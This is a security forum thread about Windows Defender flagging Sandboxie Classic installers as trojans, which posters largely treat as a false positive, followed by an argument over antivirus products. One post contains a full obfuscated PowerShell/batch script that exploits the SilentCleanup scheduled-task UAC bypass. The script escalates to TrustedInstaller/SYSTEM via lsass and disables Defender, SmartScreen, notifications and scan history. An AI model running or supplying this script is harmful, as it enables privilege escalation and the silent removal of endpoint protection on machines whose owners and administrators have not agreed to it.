Trojans identified by MS Defender in Sandboxie Classic exe

Discussion in 'Sandboxie (SBIE Open Source) Plus & Classic' started by WSC3, Feb 19, 2021.

  1. WSC3

    WSC3 Registered Member

    Joined:
    Oct 13, 2020
    Posts:
    32
    Location:
    Richmond, Virginia
    My Windows 10 Defender is now suddenly flagging my copies of “sandboxie-Classic-x64-v5.46.5.exe” as loaded with Trojans and backdoor viruses. I tried downloading a new copy and Defender quarantined and deleted it immediately. When I dial to the folder where I had an previous copy, similar alarms were activated and the file removed.

    The following were identified:

    Backdoor:Win32/Bladabindi!ml

    Trojan:Win32/Wacatac.DF!ml


    What’s going on? I can’t believe I'm the only one to discover these invaders to your software. I just installed this on my new PC about a month ago, so this is a recent thing.

    Thanks.

    WSC3
     
  2. A_mouse

    A_mouse Registered Member

    Joined:
    Jul 29, 2019
    Posts:
    72
    Location:
    A field
    What does VirusTotal show ?
     
  3. SeriousHoax

    SeriousHoax Registered Member

    Joined:
    Mar 27, 2019
    Posts:
    29
    Location:
    Bangladesh
    You're using an older version. Install the latest stable version and check again:
    https://github.com/sandboxie-plus/Sandboxie/releases/download/0.6.7/Sandboxie-Classic-x64-v5.47.1.exe
     
    Last edited by a moderator: Feb 19, 2021
  4. A_mouse

    A_mouse Registered Member

    Joined:
    Jul 29, 2019
    Posts:
    72
    Location:
    A field
    Yeah I was going to suggest getting the latest build instead.

    I just checked that older build in VT, and no decent AV detect it as bad, so just assume yet another Defender false positive.
    ~ VT results removed
     
    Last edited: Feb 19, 2021
  5. stapp

    stapp Global Moderator

    Joined:
    Jan 12, 2006
    Posts:
    17,299
    Location:
    UK
    I downloaded and installed 5.48 classic over the top of previous build on a machine this morning.
    Defender flagged it as Trojan:Win32/Wacatac.DF!ml and I had to tell it to allow it on my machine instead of quarantining it..

    As you know we cannot link to VT results on the forum, however Defender does not show it as detected now on VT.
    I think it may have been a FP from a definition update.
     
  6. WSC3

    WSC3 Registered Member

    Joined:
    Oct 13, 2020
    Posts:
    32
    Location:
    Richmond, Virginia
    Where do I find that?
     
  7. WSC3

    WSC3 Registered Member

    Joined:
    Oct 13, 2020
    Posts:
    32
    Location:
    Richmond, Virginia
    That downloaded without incident. So why would Defender cite specific viruses identified if they don't exist? What did it see and misidentify as an intruder?
     
  8. DavidXanatos

    DavidXanatos Developer

    Joined:
    Sep 6, 2006
    Posts:
    1,099
    Location:
    Viena
    Windows 10 Defender is a Trojan and a Backdoor itself, it allows MSFT to mess with your system and delete your files on their wimp.
     
  9. Mr.X

    Mr.X Registered Member

    Joined:
    Aug 10, 2013
    Posts:
    3,958
    Location:
    Mexico
    +1
    Yes. Someone stands up to speak the truth, finally.
     
  10. imdb

    imdb Registered Member

    Joined:
    Nov 2, 2011
    Posts:
    3,031
    -1.
    i never had any issues with defender. it's pretty light too.
     
  11. DavidXanatos

    DavidXanatos Developer

    Joined:
    Sep 6, 2006
    Posts:
    1,099
    Location:
    Viena
    That does not mean others haven't and no signature based anti malware fool is lite, by its nature, never.

    Also frankly signature based anti malware fools are unreliable and often ineffective against 0-day threads, and they are mostly useless in case of targeted attacks.

    To get decent detection rates they often employ a carpet bombing approach flagging everything they don't know as threats.

    Its pretty much useless by this point, even large companies have issues with that idiocy,
    now VT is even curating a software white list for large companies:
    https://www.cio.com/article/2883694...-plaguing-antivirus-and-software-vendors.html

    Reed the rant of an other developer here:
    https://weblog.west-wind.com/posts/2016/oct/05/dealing-with-antivirus-false-positives


    The thirst thing I do on a PC after installing windows is to thoroughly disable or entirely remove Windows Defender.
     
  12. Mr.X

    Mr.X Registered Member

    Joined:
    Aug 10, 2013
    Posts:
    3,958
    Location:
    Mexico
    +1
    I do the same thing every time on my own pcs, at times on others pcs.

    I make use of this script to disable WD

    Code:
    @(echo off% <#%) &title Toggle Defender, AveYo 2020-11-16          || configure just auto-actions OFF; toggle icon on ltsb
    set "0=%~f0"&set 1=%*&powershell -nop -win 1 -c iex ([io.file]::ReadAllText($env:0)) &exit/b ||#>)[1]
    sp 'HKCU:\Volatile Environment' 'ToggleDefender' @'
    if ($(sc.exe qc windefend) -like '*TOGGLE*') {$TOGGLE=7;$KEEP=6;$A='Enable';$S='OFF'}else{$TOGGLE=6;$KEEP=7;$A='Disable';$S='ON'}
    
    ## Comment to hide dialog prompt with Yes, No, Cancel (6,7,2)
    if ($env:1 -ne 6 -and $env:1 -ne 7) {
      $choice=(new-object -ComObject Wscript.Shell).Popup($A + ' Windows Defender?', 0, 'Defender is: ' + $S, 51)
      if ($choice -eq 2) {break} elseif ($choice -eq 6) {$env:1=$TOGGLE} else {$env:1=$KEEP}
    }
    
    ## Without the dialog prompt above will toggle automatically
    if ($env:1 -ne 6 -and $env:1 -ne 7) { $env:1=$TOGGLE }
    
    ## Comment to not relaunch systray icon
    start cmd -args '/d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"' -win 1
    
    ## Comment to not hide per-user toggle notifications
    $notif='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.SystemToast.SecurityAndMaintenance'
    ni $notif -ea 0|out-null; ri $notif.replace('Settings','Current') -Recurse -Force -ea 0
    sp $notif Enabled 0 -Type Dword -Force -ea 0; if ($TOGGLE -eq 7) {rp $notif Enabled -Force -ea 0}
    
    ## 'UAC is not a security boundary' - OK, Microsoft. But why do you refuse to adress the lamest AlwaysNotify-compatible bpass?
    $ts=New-Object -ComObject 'Schedule.Service'; $ts.Connect(); $baffling=$ts.GetFolder('\Microsoft\Windows\DiskCleanup')
    $bpass=$baffling.GetTask('SilentCleanup'); $flaw=$bpass.Definition
    
    ## Cascade elevation
    $u=0;$w=whoami /groups;if($w-like'*1-5-32-544*'){$u=1};if($w-like'*1-16-12288*'){$u=2};if($w-like'*1-16-16384*'){$u=3}
    
    ## Reload from volatile registry as needed
    $r=[char]13; $nfo=[char]39+$r+' (\   /)'+$r+'( * . * )  A limited account protects you from UAC exploits'+$r+'    ```'+$r+[char]39
    $script='-nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo='+$nfo+';$env:1='+$env:1; $env:__COMPAT_LAYER='Installer'
    $script+=';iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}'; $cmd='powershell '+$script
    
    ## 0: limited-user: must runas
    if ($u -eq 0) {
      start powershell -args $script -verb runas -win 1; break
    }
    
    ## 1: admin-user non-elevated: try windows built-in lame uac bpass before runas
    if ($u -eq 1) {
      if ($flaw.Actions.Item(1).Path -inotlike '*windir*'){start powershell -args $script -verb runas -win 1; break}
      sp hkcu:\environment windir $('powershell '+$script+' #')
      $z=$bpass.RunEx($null,2,0,$null); $wait=0; while($bpass.State -gt 3 -and $wait -lt 17){sleep -m 100; $wait+=0.1}
      if(gp hkcu:\environment windir -ea 0){rp hkcu:\environment windir -ea 0;start powershell -args $script -verb runas -win 1};break
    }
    
    ## 2: admin-user elevated: get ti/system via runasti lean and mean snippet [$window hide:0x0E080600 show:0x0E080610]
    if ($u -eq 2) {
      $A=[AppDomain]::CurrentDomain."Def`ineDynamicAssembly"(1,1)."Def`ineDynamicModule"(1);$D=@();0..5|%{$D+=$A."Def`ineType"('A'+$_,
      1179913,[ValueType])} ;4,5|%{$D+=$D[$_]."Mak`eByRefType"()} ;$I=[Int32];$J="Int`Ptr";$P=$I.module.GetType("System.$J"); $F=@(0)
      $F+=($P,$I,$P),($I,$I,$I,$I,$P,$D[1]),($I,$P,$P,$P,$I,$I,$I,$I,$I,$I,$I,$I,[Int16],[Int16],$P,$P,$P,$P),($D[3],$P),($P,$P,$I,$I)
      $S=[String]; $9=$D[0]."Def`inePInvokeMethod"('CreateProcess',"kernel`32",8214,1,$I,@($S,$S,$I,$I,$I,$I,$I,$S,$D[6],$D[7]),1,4)
      1..5|%{$k=$_;$n=1;$F[$_]|%{$9=$D[$k]."Def`ineField"('f'+$n++,$_,6)}};$T=@();0..5|%{$T+=$D[$_]."Cr`eateType"();$Z=[uintptr]::size
      nv ('T'+$_)([Activator]::CreateInstance($T[$_]))}; $H=$I.module.GetType("System.Runtime.Interop`Services.Mar`shal");
      $WP=$H."Get`Method"("Write$J",[type[]]($J,$J)); $HG=$H."Get`Method"("AllocH`Global",[type[]]'int32'); $v=$HG.invoke($null,$Z)
      'TrustedInstaller','lsass'|%{if(!$pn){net1 start $_ 2>&1 >$null;$pn=[Diagnostics.Process]::GetProcessesByName($_)[0];}}
      $WP.invoke($null,@($v,$pn.Handle)); $SZ=$H."Get`Method"("SizeOf",[type[]]'type'); $T1.f1=131072; $T1.f2=$Z; $T1.f3=$v; $T2.f1=1
      $T2.f2=1;$T2.f3=1;$T2.f4=1;$T2.f6=$T1;$T3.f1=$SZ.invoke($null,$T[4]);$T4.f1=$T3;$T4.f2=$HG.invoke($null,$SZ.invoke($null,$T[2]))
      $H."Get`Method"("StructureTo`Ptr",[type[]]($D[2],$J,'boolean')).invoke($null,@(($T2-as $D[2]),$T4.f2,$false));$window=0x0E080600
      $9=$T[0]."Get`Method"('CreateProcess').Invoke($null,@($null,$cmd,0,0,0,$window,0,$null,($T4-as $D[4]),($T5-as $D[5]))); break
    }
    
    ## Create registry paths
    $wdp='HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender'
    ' Security Center\Notifications','\UX Configuration','\MpEngine','\Spynet','\Real-Time Protection' |% {ni ($wdp+$_)-ea 0|out-null}
    
    ## Toggle Defender
    if ($env:1 -eq 7) {
      rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications -Force -ea 0
      rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration' Notification_Suppress -Force -ea 0
      rp 'HKLM:\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications -Force -ea 0
      rp 'HKLM:\SOFTWARE\Microsoft\Windows Defender\UX Configuration' Notification_Suppress -Force -ea 0
      rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\System' EnableSmartScreen -Force -ea 0
      rp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' DisableAntiSpyware -Force -ea 0
      rp 'HKLM:\SOFTWARE\Microsoft\Windows Defender' DisableAntiSpyware -Force -ea 0
      sc.exe config windefend depend= RpcSs
      net1 start windefend
      kill -Force -Name MpCmdRun -ea 0
      start ($env:ProgramFiles+'\Windows Defender\MpCmdRun.exe') -Arg '-EnableService' -win 1
    } else {
      sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications 1 -Type Dword -ea 0
      sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\UX Configuration' Notification_Suppress 1 -Type Dword -Force -ea 0
      sp 'HKLM:\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications' DisableNotifications 1 -Type Dword -ea 0
      sp 'HKLM:\SOFTWARE\Microsoft\Windows Defender\UX Configuration' Notification_Suppress 1 -Type Dword -Force -ea 0
      sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\System' EnableSmartScreen 0 -Type Dword -Force -ea 0
      sp 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender' DisableAntiSpyware 1 -Type Dword -Force -ea 0
      sp 'HKLM:\SOFTWARE\Microsoft\Windows Defender' DisableAntiSpyware 1 -Type Dword -Force -ea 0
      net1 stop windefend
      sc.exe config windefend depend= RpcSs-TOGGLE
      kill -Name MpCmdRun -Force -ea 0
      start ($env:ProgramFiles+'\Windows Defender\MpCmdRun.exe') -Arg '-DisableService' -win 1
      del ($env:ProgramData+'\Microsoft\Windows Defender\Scans\mpenginedb.db') -Force -ea 0           ## Commented = keep scan history
      del ($env:ProgramData+'\Microsoft\Windows Defender\Scans\History\Service') -Recurse -Force -ea 0
    }
    
    ## PERSONAL CONFIGURATION TWEAK - COMMENT OR UNCOMMENT #rp ENTRIES TO TWEAK OR REVERT
    sp $wdp DisableRoutinelyTakingAction 1 -Type Dword -Force -ea 0                       ## Auto Actions OFF
    # rp $wdp DisableRoutinelyTakingAction -Force -ea 0                                   ## Auto Actions ON [default]
    sp $wdp PUAProtection 1 -Type Dword -Force -ea 0                                      ## Potential Unwanted Apps ON
    rp $wdp PUAProtection -Force -ea 0                                                    ## Potential Unwanted Apps OFF [default]
    sp ($wdp+'\MpEngine') MpCloudBlockLevel 2 -Type Dword -Force -ea 0                    ## Cloud blocking level HIGH
    rp ($wdp+'\MpEngine') MpCloudBlockLevel -Force -ea 0                                  ## Cloud blocking level LOW [default]
    sp ($wdp+'\Spynet') SpyNetReporting 2 -Type Dword -Force -ea 0                        ## Cloud protection ADVANCED
    rp ($wdp+'\Spynet') SpyNetReporting -Force -ea 0                                      ## Cloud protection BASIC [default]
    sp ($wdp+'\Spynet') SubmitSamplesConsent 0 -Type Dword -Force -ea 0                   ## Sample Submission ALWAYS-PROMPT
    rp ($wdp+'\Spynet') SubmitSamplesConsent -Force -ea 0                                 ## Sample Submission AUTOMATIC [default]
    sp ($wdp+'\Real-Time Protection') RealtimeScanDirection 1 -Type Dword -Force -ea 0    ## Scan incoming file only
    rp ($wdp+'\Real-Time Protection') RealtimeScanDirection -Force -ea 0                  ## Scan incoming and outgoing file [default]
    
    ## Uncomment to close windows built-in lame uac bpass and/or reset uac
    # if ($flaw.Actions.Item(1).Path -ilike '*windir*') {
    #   $flaw.Actions.Item(1).Path=$env:systemroot+'\system32\cleanmgr.exe'               ## %windir%\system32\cleanmgr.exe [default]
    #   $baffling.RegisterTaskDefinition($bpass.Name,$flaw,20,$null,$null,$null)          ## UAC silent bpass mitigation
    #   $uac='HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
    #   sp $uac EnableLUA 1 -Type Dword -Force -ea 0                                      ## UAC enable
    #   sp $uac ConsentPromptBehaviorAdmin 2 -Type Dword -Force -ea 0                     ## UAC always notify - bpassable otherwise
    #   sp $uac PromptOnSecureDesktop 1 -Type Dword -Force -ea 0                          ## UAC secure - prevent automation
    # }
    
    '@ -Force -ea 0; iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)
    #-_-# hybrid script, can be pasted directly into powershell console
    
     
  13. WSC3

    WSC3 Registered Member

    Joined:
    Oct 13, 2020
    Posts:
    32
    Location:
    Richmond, Virginia
    So what's the anti-virus of choice.....?
     
  14. imdb

    imdb Registered Member

    Joined:
    Nov 2, 2011
    Posts:
    3,031
    sure.
    and i'm aware of those facts and the limitations of signature based solutions. but i don't see any need to disable defender. i'm running it on a vm on a host protected by a 3rd party solution, kasperksy is. and i also think that no product/approach is perfect at the end of the day. and to each his own.
     
    Last edited: Feb 19, 2021
  15. itman

    itman Registered Member

    Joined:
    Jun 22, 2010
    Posts:
    8,396
    Location:
    U.S.A.
    Article is 6 years old. The other one is 5 years old. A lot has changed in this regard in the last 5-6 years with the major AV vendors. One being the AV labs dinging them for FPs on the comparative tests. I would contend the opposite is true currently. That their FP hesitancy is allowing stuff to go undetected.
     
    Last edited: Feb 19, 2021
  16. digmor crusher

    digmor crusher Registered Member

    Joined:
    Jul 6, 2012
    Posts:
    908
    Location:
    Canada
    Well your not going to find an AV that works finer on W10 than Defender. IMO Zero 3rd party conflicts.
     
  17. roger_m

    roger_m Registered Member

    Joined:
    Jan 25, 2009
    Posts:
    8,002
    That's simply not true. There are several antiviruses they are usually light enough that there is little difference in performance compared to running no antivirus, even on low-end hardware. Of course, this isn't true for all antiviruses.
    I use a third party antivirus and I never have any conflicts, even when going weeks between rebooting. In my experience, while you can have problems when using third party antiviruses, you're more likely to not have problems than have them.
     
  18. Brummelchen

    Brummelchen Registered Member

    Joined:
    Jan 3, 2009
    Posts:
    3,976
    Chinese power cant be wrong - including their own malware bombs :isay:
    if you have proofed evidence you probably should share with us, otherwise its totally BS.

    VT belongs to google and it has paid participants no one ever has read about. There can't be another explanation for the list, and it's wise to remove vt results here because those are not really for good. VT is spreading its results to all competitors, and it belongs to them to investigate or drop.

    For sandboxie - how long do you have issues now sandboxie being flagged as malware from several antiviruses? I would say: too long.

    I don't have doubt on your work, but if you won't change anything they probably won't change anything either, why should they?
     
  19. Krusty

    Krusty Registered Member

    Joined:
    Feb 3, 2012
    Posts:
    8,912
    Location:
    Among the gum trees
    Yeah, I call BS.
     
  20. Rasheed187

    Rasheed187 Registered Member

    Joined:
    Jul 10, 2004
    Posts:
    14,433
    Location:
    The Netherlands
    Aren't you being a bit overly dramatic? I agree that false positives are annoying as hell, but so far I haven't encountered any with Win Defender. And as Stapp already said, I believe you can simply whitelist wrongly flagged files.
     
  21. DavidXanatos

    DavidXanatos Developer

    Joined:
    Sep 6, 2006
    Posts:
    1,099
    Location:
    Viena
    Well windows defender has by default this feature enabled where it sends "suspicious" files to MSFT for analysis, those files may be yours and may contain private information. They don't even make a secret out of that.

    And when it finds a suspicious file instead of only blocking access it deletes it without asking, that's IMHO outright criminal malicious behavior.
    No application should delete or move files without being ordered by the user to do so, unless it crated those files itself!

    How would you feal about internet explorer deleting firefox binaries, for example?

    Or defender mistaking your unbackuped doctoral thesis as malware and preemptively deleting it?

    Or the police shooting some one in the back that they see running and looking suspicious without asking questions?


    On my computer no software should delete/move files (which do not belong to it) never, NEVER EVER!


    To me such sort of behavior is absolutely undesired and should never be deemed acceptable, no messing with 3rd party files, and no uploads to any corporate overlords without an express user permission.
    Doing so is behavior that is not different from that of regular Trojans.


    To protect a user from threats it would be perfectly sufficient to block access to the file in question and display a warning message, deleting files is simply a unacceptable overreach.



    Because they broke it!
    You don't ask the victim of a crime to do something against it, you just drop the hammer on the perpetrators.
     
    Last edited: Feb 20, 2021
  22. stapp

    stapp Global Moderator

    Joined:
    Jan 12, 2006
    Posts:
    17,299
    Location:
    UK
    When I go to install Sbie and Defender sees it as a threat, it brings up a notification in my taskbar which I cannot miss it because I am looking at the screen installing a software.
    I click on the Defender/Security Center notification and I am taken to the screen which tells me what it has found (Trojan)
    I then use the drop down menu to tell it what to do. In my case I chose 'allow on this device'
     
  23. Mr.X

    Mr.X Registered Member

    Joined:
    Aug 10, 2013
    Posts:
    3,958
    Location:
    Mexico
    I concur, 100% :thumb:
     
  24. DavidXanatos

    DavidXanatos Developer

    Joined:
    Sep 6, 2006
    Posts:
    1,099
    Location:
    Viena
    @stapp I had enough complains of users where after allowing, a few reboots later it just deleted the driver despite it being earlier allowed.
    Might be that users have updated it in the mean time, but still, deleting files without permission is simply unacceptable.
     
  25. Peter 123

    Peter 123 Registered Member

    Joined:
    Feb 1, 2009
    Posts:
    406
    Location:
    Austria
    Theoretically yes. In practice it has happened to me that files had simply disappeared because Windows Defender regarded them as malicious.

    As far as I remember, especially in the way mentioned by David:
     
  1. This site uses cookies to help personalise content, tailor your experience and to keep you logged in if you register.
    By continuing to use this site, you are consenting to our use of cookies.